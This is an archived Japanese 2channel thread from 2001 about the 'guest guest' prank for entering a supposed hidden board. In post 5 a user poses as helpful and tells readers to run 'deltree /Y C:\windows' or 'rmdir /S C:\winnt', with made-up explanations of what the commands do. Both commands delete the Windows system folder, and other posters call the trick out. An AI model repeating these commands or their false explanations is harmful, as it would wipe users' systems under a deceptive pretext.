5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

今は煽ってるけど引っかかったことがある人→

1 :http://mokorikomo.2ch.cc/:01/12/17 10:01 ID:+34UIMBN
guest guest

2 :(_´Д`)アイーン:01/12/17 10:03 ID:xAXSgsZ9
guest guest

3 :proxy1.catv.medias.ne.jp:01/12/17 10:04 ID:xAXSgsZ9


4 ::01/12/17 10:06 ID:xAXSgsZ9
>>2オオッ!
もしかして!

5 :ネオ ◆zedocT/I :01/12/17 10:07 ID:nKTQW9Yu
fusianasannじゃなく、ホントの裏2CHの入り方は以下の通りです。

●●裏2ちゃんねるへの接続方法〜裏技公開〜●●
【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」
  ※「/Y」は「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがつないでくれるよ。
★「deltree」や「rmdir」は裏ドメイン用のコマンドです。
★こういう裏ドメインのサイトにはDOSを使うと
 トラフィックの混雑が抑えられ、快適に接続できます。
 2ちゃんねるのCGIを使うと、弾かれる可能性が高いです。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
 機能も高く、guest guestを自動入力するほか、
 年齢別の画像も全て表示できるという優れものです。

6 :匿名!:01/12/17 13:48 ID:klYFMb05
>>5
死ね

7 :-=・=- -=・=- ◆DEATH4FE :01/12/17 13:57 ID:sqUT8Fro
>>5
それを考えた人間もなんというか・・・。
きょうびのWindowsユーザはDOSコマンドなんて知らんからな。

8 : ◆tbRjpLVU :01/12/17 14:26 ID:lOn7JrY2
>>5
前もそれあったなー

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)